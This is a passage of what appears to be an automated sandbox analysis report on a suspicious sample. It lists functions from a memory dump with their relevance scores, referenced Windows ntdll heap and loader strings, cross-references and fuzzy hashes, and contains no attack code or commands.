Instruction Fuzzy Hash: D4B190725083569FD721CF98C840A6FBBE9BB88704F05492EFA85DB340D770D948CBA2

Function 015FD02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON

Download Yara Rule

Strings

@, xrefs: 015FD09D
@, xrefs: 015FD2B3
\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 015FD06F
Control Panel\Desktop\LanguageConfiguration, xrefs: 015FD136
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 015FD263
@, xrefs: 015FD24F
Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 015FD0E6
Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 015FD202

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
API String ID: 0-1356375266
Opcode ID: cbd660235d90a9cd5eb2d24244f26175ddd690f90661945de700ee43bedda51d
Instruction ID: 54e6a173e5e368869d6bec846263bb8a97629a8dae71e29ef36c51159456fa61
Opcode Fuzzy Hash: cbd660235d90a9cd5eb2d24244f26175ddd690f90661945de700ee43bedda51d
Instruction Fuzzy Hash: F1A13B715083469FD721DF54C840B9FBBE9BB84715F10492EFA899B240D774D948CB93

Function 016AF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 016AF55F, 016AF5A4, 016AF5F0, 016AF655, 016AF6A3, 016AF6EA
Invalid ReserveSize parameter - %Ix, xrefs: 016AF56B
Specified HeapBase (%p) invalid, Status = %lx, xrefs: 016AF664
Invalid CommitSize parameter - %Ix, xrefs: 016AF5B2
Specified HeapBase (%p) != to BaseAddress (%p), xrefs: 016AF6B2
Specified HeapBase (%p) is free or not writable, xrefs: 016AF6F8
May not specify Lock parameter with HEAP_NO_SERIALIZE, xrefs: 016AF5FB
HEAP[%wZ]: , xrefs: 016AF552, 016AF597, 016AF5E3, 016AF648, 016AF696, 016AF6DD

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
API String ID: 0-2224505338
Opcode ID: 81815e66537735d07261950e33c97360e0fb7738b34eb193826b9d4a82d57a64
Instruction ID: 8d3957dc0c1fcb293ec372d9aa70e1fb47cb3ff26dbe4d903c4b54f43de7f659
Opcode Fuzzy Hash: 81815e66537735d07261950e33c97360e0fb7738b34eb193826b9d4a82d57a64
Instruction Fuzzy Hash: 7A51CC32221246EFD7219BA9DD85E6ABBB4FF04A60F54849DF6019F221D771DD40CF12

Function 015FF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0165DCF3, 0165DE37, 0165E015, 0165E12D
(LONG)FreeEntry->Size > 1, xrefs: 0165E020
(!TrailingUCR), xrefs: 0165E138
(UCRBlock != NULL), xrefs: 0165DCFE
((LONG)FreeEntry->Size > 1), xrefs: 0165DE42
HEAP[%wZ]: , xrefs: 0165DCE6, 0165DE2A, 0165E008, 0165E120

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
API String ID: 0-523794902
Opcode ID: 20e6418e8e181ca9e244ed1706f107c8ed39eee91a222a3d4804c15c92fec21f
Instruction ID: fa1c0acd0d1481fc1183d9fc95ad138e59c8d8478300f62125fabd744cf833c9
Opcode Fuzzy Hash: 20e6418e8e181ca9e244ed1706f107c8ed39eee91a222a3d4804c15c92fec21f
Instruction Fuzzy Hash: 9442D1322047829FD715DF28C884B6ABBE6FF84604F08496EFA86CB791D770D945CB52

Function 0161B0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON

Download Yara Rule

Strings

API set, xrefs: 01668201, 01668206
minkernel\ntdll\ldrutil.c, xrefs: 0166821A, 016682EE
DLL %wZ was redirected to %wZ by %s, xrefs: 01668209
LdrpPreprocessDllName, xrefs: 01668210, 016682E4
LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx, xrefs: 016682DD
SxS, xrefs: 016681FA

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
API String ID: 0-122214566
Opcode ID: 1fdfae81988f62cce396d6de60292f8098e90d288e34fc73cda5fa277f6de326
Instruction ID: ee97d434b0218562df5401d1d2419d833f1668f58814c089a4f145df5a13fa84
Opcode Fuzzy Hash: 1fdfae81988f62cce396d6de60292f8098e90d288e34fc73cda5fa277f6de326
Instruction Fuzzy Hash: 49C13631A002169BDB259B78CC91BBEBBB9AF45700F1C806DE902DB399D7B4DC49C390

Function 0163631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Delaying execution failed with status 0x%08lx, xrefs: 01674063
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 01673EE3
_LdrpInitialize, xrefs: 01673EEA, 01673F4C, 01674010, 0167406A
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 01674009
Process initialization failed with status 0x%08lx, xrefs: 01673F45
minkernel\ntdll\ldrinit.c, xrefs: 01673EF4, 01673F56, 0167401A, 01674074

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: c65c56b9f05fcc463a2e5f78bf711b64967eeb228f5f104f8782f978464cc6ca
Instruction ID: 2d929a53d04a15e10375e140f69e4eeeb1272c347c60b8baa1d3a325e50a7424
Opcode Fuzzy Hash: c65c56b9f05fcc463a2e5f78bf711b64967eeb228f5f104f8782f978464cc6ca
Instruction Fuzzy Hash: AA914971A01315EBEB3ADF28DC49B6A7BA6FF80764F14101DEA016B3C5DB705902C799

Function 016AF0A5 Relevance: 7.7, Strings: 6, Instructions: 231COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 016AF274, 016AF321, 016AF378
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 016AF33E
Just allocated block at %p for %Ix bytes, xrefs: 016AF288
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 016AF389
RtlAllocateHeap, xrefs: 016AF0ED
HEAP[%wZ]: , xrefs: 016AF267, 016AF314, 016AF36B

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 0-1745908468
Opcode ID: be06856119e66b3111053da915781b92181cdeb75f80b7dcded4eddb879e6f72
Instruction ID: 9007dbeaf15a34a55188ba2d3d70a0ba193e86376c81aba669cdc48d2fa5a536
Opcode Fuzzy Hash: be06856119e66b3111053da915781b92181cdeb75f80b7dcded4eddb879e6f72
Instruction Fuzzy Hash: E091D931A006469FDB22DFA8C840AAEBBF2FF59310F48849DE541AB351CB76AD41CF55

Function 015F640D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 015F6446
Getting the shim engine exports failed with status 0x%08lx, xrefs: 01659790
Loading the shim engine DLL failed with status 0x%08lx, xrefs: 016597B9
LdrpInitShimEngine, xrefs: 01659783, 01659796, 016597BF
Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 0165977C
minkernel\ntdll\ldrinit.c, xrefs: 016597A0, 016597C9

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 497a04724f974cae4cae1c0526add5e5c04d6a00ae8bacdcd3fc5232f26d4938
Instruction ID: ca7c9e5dc1eb689ac5aee2929dfe3f85ff5d09cd973a8aa7337b139c6b3533ca
Opcode Fuzzy Hash: 497a04724f974cae4cae1c0526add5e5c04d6a00ae8bacdcd3fc5232f26d4938
Instruction Fuzzy Hash: 3151B071648305DBE324DF24CC95B6B7BE9FB84748F00091EFA959B2A4DB30E904CB96

Function 0163C5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

Unable to build import redirection Table, Status = 0x%x, xrefs: 01677FF0
minkernel\ntdll\ldrredirect.c, xrefs: 01677F8C, 01678000
LdrpInitializeProcess, xrefs: 0163C5E4
Loading import redirection DLL: '%wZ', xrefs: 01677F7B
LdrpInitializeImportRedirection, xrefs: 01677F82, 01677FF6
minkernel\ntdll\ldrinit.c, xrefs: 0163C5E3

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 25b89159bbf2d15e703d2ea9d07354319fef81a0cdabad209f608128aadbd35e
Instruction ID: cfc6d97a1143194b7976fa6e683d2338f2468b6a37a53b229e8b89abf186c989
Opcode Fuzzy Hash: 25b89159bbf2d15e703d2ea9d07354319fef81a0cdabad209f608128aadbd35e
Instruction Fuzzy Hash: 4A31C271A447029FC324EF28DD49E2ABBD5FF94A60F01055DF985AB391DB20EC05CBA6

Function 01632594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 01671FA9
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01671F82
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01671F8A
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 01671FC9
SXS: %s() passed the empty activation context, xrefs: 01671F6F
RtlGetAssemblyStorageRoot, xrefs: 01671F6A, 01671FA4, 01671FC4

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: a131efdcc1d5a4188617b39cd27a4fb4a0d21ef517865e413d55d120987e8bfa
Instruction ID: e7b4bbb31bc24ff83e181216f583537a15482c5bf2ec13ed973f2031ef8aba0e
Opcode Fuzzy Hash: a131efdcc1d5a4188617b39cd27a4fb4a0d21ef517865e413d55d120987e8bfa
Instruction Fuzzy Hash: 1731FB72F00225BBE7219ADE9C55F5B7AA8AFA6A50F04415DFA017B241D370AE01C7E4

Function 0162510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON

Download Yara Rule

Strings

Kernel-MUI-Number-Allowed, xrefs: 01625167
Kernel-MUI-Language-SKU, xrefs: 0162534B
WindowsExcludedProcs, xrefs: 0162514A
Kernel-MUI-Language-Disallowed, xrefs: 01625272
Kernel-MUI-Language-Allowed, xrefs: 0162519B

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 6ded3ae990e344de2f5c9803b493dde5b23fe3d169b95c0858e1dc5b953327fa
Instruction ID: 965e55b188feeb87cb88db996eeb2c45d5220e0519016c30119c39e38c51365d
Opcode Fuzzy Hash: 6ded3ae990e344de2f5c9803b493dde5b23fe3d169b95c0858e1dc5b953327fa
Instruction Fuzzy Hash: 6EF11A72E01629EFDB21DF98CD40AEEBBB9FF19650F15415AE902E7210E7709A01CB94

Function 0160A2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

LdrResFallbackLangList Exit, xrefs: 0160A31F
8, xrefs: 0160A307
6, xrefs: 0160A317
LdrResFallbackLangList Enter, xrefs: 0160A30F

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: edd845a2c13cd5aff80adfcf9b7a882f61181bfaa5bf9508beb2ca1c74138a7f
Instruction ID: c89f82e6eca9ee3157f35a79d246b94edf6b055e1c54596e11c94a1b01c4113f
Opcode Fuzzy Hash: edd845a2c13cd5aff80adfcf9b7a882f61181bfaa5bf9508beb2ca1c74138a7f
Instruction Fuzzy Hash: BCC16874108382CBD72ACF98C940B6BB7E4BF84784F04496DF9968B391E774C94ACB56

Function 01638322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

LdrpInitializeProcess, xrefs: 01638342
@, xrefs: 016384B1
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0163847E
minkernel\ntdll\ldrinit.c, xrefs: 01638341

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 3511b2a26c1573ddd7d1fbd2c7069d5ec32d57ca6580485fa6525be00b8c3290
Instruction ID: 94040aeeab2a91be3272dbf81547f2bd29d20aa12bb328e18537b90c9f17aac7
Opcode Fuzzy Hash: 3511b2a26c1573ddd7d1fbd2c7069d5ec32d57ca6580485fa6525be00b8c3290
Instruction Fuzzy Hash: AA91BC71509341AFE722DE64CC44FABBBEDBB94744F400A2EFA8583252E734D944CB66

Function 016063CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01660DEC
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01660E2F
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 01660EB5
ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 01660E72

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 7add4b3a709d5e895da1f8ddb27991e0a97b544c4e89b845f93adef73f66614b
Instruction ID: c57101f0d6d2555aed26688110d84524e0d301647b2c11fc667cf745d83dd91a
Opcode Fuzzy Hash: 7add4b3a709d5e895da1f8ddb27991e0a97b544c4e89b845f93adef73f66614b
Instruction Fuzzy Hash: A371DFB19043059FCB62EF58CC84B9B7BAEAF95750F00456CFD488B286D334E588CB92

Function 015FF5C7 Relevance: 5.2, Strings: 4, Instructions: 188COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0165E2DD
ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0165E2F2
`, xrefs: 0165E1B7
HEAP[%wZ]: , xrefs: 0165E18D

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
API String ID: 0-2586055223
Opcode ID: 31ff0e5e58154f3dd9d7aab41beda22363581692b95eb15e1b899cd89ce4c7ca
Instruction ID: 3a19a8702531a96751cb6f033a0eab53493a367d048ffe154643c335f012f169
Opcode Fuzzy Hash: 31ff0e5e58154f3dd9d7aab41beda22363581692b95eb15e1b899cd89ce4c7ca
Instruction Fuzzy Hash: AC61F3322046419FE722DB68CC44F67BBE9FF84B50F08086DFA558B691DB34E900C761

Function 0162237A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

apphelp.dll, xrefs: 01622382
LdrpDynamicShimModule, xrefs: 0166A7A5
minkernel\ntdll\ldrinit.c, xrefs: 0166A7AF
Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0166A79F

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: d2c15317efe97e9357414c9d66254c15dc967cf88e79e8c1cb25a2c20d5f521d
Instruction ID: 09fbddcac648ee40e5276a43f5fd8501d5358837d0ec8bf1493b52921e20d74e
Opcode Fuzzy Hash: d2c15317efe97e9357414c9d66254c15dc967cf88e79e8c1cb25a2c20d5f521d
Instruction Fuzzy Hash: 72315976A00201EFEB359F9DDC85A7A7BBAFB80B00F15401DE9127B345DB745852CB50

Function 015F90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 0165B83C, 0165B879
VirtualQuery Failed 0x%p %x, xrefs: 0165B886
VirtualProtect Failed 0x%p %x, xrefs: 0165B849
HEAP[%wZ]: , xrefs: 0165B82F, 0165B86C

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
API String ID: 0-1391187441
Opcode ID: 1ab918a1516bcac588c9382683a3795ba2b02cfb45397fc6eb36e7015a9e2a0e
Instruction ID: 8e160a2f2949bd78a5f93d9a5cb1c78cfd940c9dc2ed476a4c470ef32d092cac
Opcode Fuzzy Hash: 1ab918a1516bcac588c9382683a3795ba2b02cfb45397fc6eb36e7015a9e2a0e
Instruction Fuzzy Hash: 3131F232A00205EFDB11DB59CC88F9ABBB9FB44760F1544ADFA11AF291D770E940CA60

Function 016A9060 Relevance: 4.3, Strings: 3, Instructions: 558COMMON

Download Yara Rule

Strings

0, xrefs: 016A9776
, xrefs: 016A9657
, xrefs: 016A9704

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: $ $0
API String ID: 0-3352262554
Opcode ID: 955813f7f04a0df41dd00e627e9a8b8d96c68b5e8f286c73d3cc4eaeacdb32d9
Instruction ID: 19b3ad8017651168bac6f77c18b176a7743a074649a05bb64ff96f20bcbc18b4
Opcode Fuzzy Hash: 955813f7f04a0df41dd00e627e9a8b8d96c68b5e8f286c73d3cc4eaeacdb32d9
Instruction Fuzzy Hash: 593210B16083818FE360CF68C884B5BBBE5BB88348F54492EF99987351D774E949CF52

Function 01601380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 016014B6
HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 01601648
HEAP[%wZ]: , xrefs: 01601632

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
API String ID: 0-3178619729
Opcode ID: 1b11e5f18a8e7fb5cd1a068a8283c9418f60bba37f3a48056242a266867aaecf
Instruction ID: 915b38cfb79889bd593f5342bc1e94b1c8a1971a23631beb49fb227228defd86
Opcode Fuzzy Hash: 1b11e5f18a8e7fb5cd1a068a8283c9418f60bba37f3a48056242a266867aaecf
Instruction Fuzzy Hash: 53E1E170A042469FDB2ACF68CC5167BBBF1EF49304F18885DE9968B386E734E945CB50

Function 0162F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON

Download Yara Rule

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016700F1
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016700C7
RTL: Re-Waiting, xrefs: 01670128

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
API String ID: 0-2474120054
Opcode ID: 1109e9fba02e1860a5184bd5de1c7ab8a23e3760d80d9f15f8f5e270eb540822
Instruction ID: 74546e8b0a2da9fded8fd85c5ee3486282cfc43164ba89b9c0f68be0255f85bd
Opcode Fuzzy Hash: 1109e9fba02e1860a5184bd5de1c7ab8a23e3760d80d9f15f8f5e270eb540822
Instruction Fuzzy Hash: BEE19930608B529FD725CF28DC84B2ABBF1BB85324F140A9DF5A58B3A1D774E845CB52

Function 0160B5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 0160B622
LdrResGetRCConfig Exit, xrefs: 0160B634
MUI, xrefs: 0160B5F8, 0160B707

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
API String ID: 0-1145731471
Opcode ID: 20225d57a26da0c188d19ab9f23db06228ccb4c4a21d01bf2b21dd128eb22a39
Instruction ID: b386d35ccc29493c5d5f2d809c22cb33a72995b8ae25f4359e05e9b3b1042c38
Opcode Fuzzy Hash: 20225d57a26da0c188d19ab9f23db06228ccb4c4a21d01bf2b21dd128eb22a39
Instruction Fuzzy Hash: 70B17B75A106258BDB2ACF69CC90BAEBBBABF44714F148529E915EB790D730EC41CF04

Function 0168330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON

Download Yara Rule

Strings

\SystemRoot\system32\, xrefs: 016834C2
DelegatedNtdll, xrefs: 0168334E
@, xrefs: 0168351F

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: @$DelegatedNtdll$\SystemRoot\system32\
API String ID: 0-2391371766
Opcode ID: 94e95b315cb773e5678459b1e5f86316ca90ea1ec9b3b82f2218fea6c72837b6
Instruction ID: 2c82a70b8de9f69a6af3f9f6f7ca2f631b666be9fad04bf45fd79cb32f0d282e
Opcode Fuzzy Hash: 94e95b315cb773e5678459b1e5f86316ca90ea1ec9b3b82f2218fea6c72837b6
Instruction Fuzzy Hash: 85B18C71604752AFE322EF58CC80B6BB7E9BB44B14F110A2DFA509B390D771E844CB96

Function 015FA147 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 0165C075
\??\, xrefs: 0165BF73
UseFilter, xrefs: 015FA171

Memory Dump Source

Source File: 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015D0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_15d0000_AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: aef426342113c4d04f6f66b58816b300e6b103b8bf463222736d69ecb7d0936c
Instruction ID: c3038794c66244380bbe91a65bee448f99c8a7316a2785267e8ad9333337256f
Opcode Fuzzy Hash: aef426342113c4d04f6f66b58816b300e6b103b8bf463222736d69ecb7d0936c
Instruction Fuzzy Hash: E0A17A329016299BDB71DF28CC88BAAB7B9FF04714F1005EAEA09A7250D7359EC5CF54

Function 0169327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON

Download Yara Rule

Strings

@, xrefs: 016933F7
LdrpResMapFile Enter, xrefs: 016932A5
